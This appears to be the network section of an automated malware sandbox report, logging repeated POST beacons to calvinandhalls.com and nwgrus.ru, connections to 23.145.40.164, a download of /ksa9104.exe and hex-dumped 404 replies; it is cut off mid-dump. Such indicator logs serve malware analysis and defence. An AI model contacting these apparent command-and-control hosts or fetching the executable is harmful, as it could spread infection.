Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://odhashqreyopr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://tbgynejneafdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://mqhahmibwlnntq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://xdrrfipvxfhn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://vgsfrcxsvaoca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://msqyarjhmbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://cmiubtivnasjoudw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jiwfwlcanebf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://lymwoggejifjeow.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://sobtugvkyrrny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dwgdbsxrjnnesjc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jdfqkdrqtsch.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yjbjsjjdituglvfr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ifilpxcdnwgbgge.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ciwodbbyumgi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uctglujhyyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://semcigauupb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mjkmetahcah.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fkvpkdvartxwe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hqcqhgjcmtgx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uwtleoojxrcvopte.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://puvaafsthshrcum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dvyvdbiqyxa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vjfbbnssutajqo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://icltdtwcxuda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hxmpwtofksapy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://prhupsyenaon.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pjcbyveqviwch.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uppdgnyegjvory.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ldpymxrfawi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ucebrpsptgm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wvyisbukobdqdei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kymcsuriadoaei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wypsmdkfdcadpn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://erjyaeignxsu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mcjitqwtqilsk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cweiuociftg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ncmvgkvwguax.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://trelswnfdtmn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mltvlrabpgii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wfqqxnqsmcop.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gottjuiosjatm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sgntleolvdwaddkp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jevspcjflxdrnyqd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xvjdoetwalpqj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rsomhlsnqixrhe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: calvinandhalls.com

Source: unknown

HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ilsdlpkysrci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: calvinandhalls.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:27 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:40 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:41 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:28:50 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:05 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:25 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:36 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 21:30:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 